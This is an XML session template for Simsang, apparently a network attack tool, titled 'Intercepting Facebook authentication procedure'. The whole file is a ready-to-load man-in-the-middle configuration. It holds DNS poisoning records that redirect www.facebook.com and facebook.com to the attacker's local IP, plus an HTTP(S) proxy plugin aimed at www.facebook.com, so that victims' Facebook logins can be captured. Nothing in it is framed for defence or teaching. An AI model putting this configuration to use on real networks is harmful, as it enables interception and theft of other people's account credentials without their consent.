<SessionTemplate>
<Config name="authentication_facebook" description="Intercepting Facebook authentication procedure" date="2016-02-03">
<Author name="Simsang" reference="http://buglist.io/" />
</Config>

<Plugins>
<Plugin name="DNS Poisoning" dirname="DNSPoisoning">

<ArrayOfDNSPoisonRecord xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <DNSPoisonRecord>
    <HostName>www.facebook.com</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>facebook.com</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>  
</ArrayOfDNSPoisonRecord>
</Plugin>


<Plugin name="HTTP(S) proxy" dirname="HTTPProxy">

<PluginData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <RemoteHost>www.facebook.com</RemoteHost>
  <RedirectURL />
  <Records />
</PluginData>
</Plugin>


</Plugins>

</SessionTemplate>
